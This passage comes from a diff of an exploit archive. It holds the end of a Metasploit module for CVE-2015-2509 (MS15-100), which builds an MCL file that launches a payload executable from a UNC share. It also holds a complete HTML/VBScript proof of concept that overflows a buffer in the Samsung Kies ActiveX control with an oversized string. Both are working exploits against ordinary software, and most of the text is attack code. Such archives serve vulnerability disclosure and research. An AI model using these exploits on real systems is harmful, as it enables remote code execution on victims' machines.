'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r',
],
'References' =>
[
['CVE', '2015-2509'],
['MSB', 'MS15-100']
],
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'false'
},
'Platform' => 'win',
'Targets' =>
[
['Windows', {}],
],
'Privileged' => false,
'DisclosureDate' => "Sep 8 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])
], self.class)
deregister_options('FILE_CONTENTS')
end
def generate_mcl
%Q|<application run="#{unc}" />|
end
def primer
self.file_contents = generate_payload_exe
print_status("Malicious executable at #{unc}...")
print_status("Creating '#{datastore['FILENAME']}' file ...")
mcl = generate_mcl
file_create(mcl)
end
end

30
platforms/windows/remote/38206.html Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/57249/info
Samsung Kies is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer.
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.
<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Remote Buffer Overflow Vulnerability in Samsung Kies v.
2.5.0.12114_1 </title>
</head>
<script language='vbscript'>
Sub PoC()
arg1="defaultV"
arg2=String(14356, "A")
arg3=1
arg4=1
Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4
End Sub
</script>
<body>
<h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech
Bridge Security Research Lab</h3>
<input language=VBScript onclick=PoC() type=button value="Proof of
Concept">
</body>
<object
classid='clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8'id='Target'></object>
</html>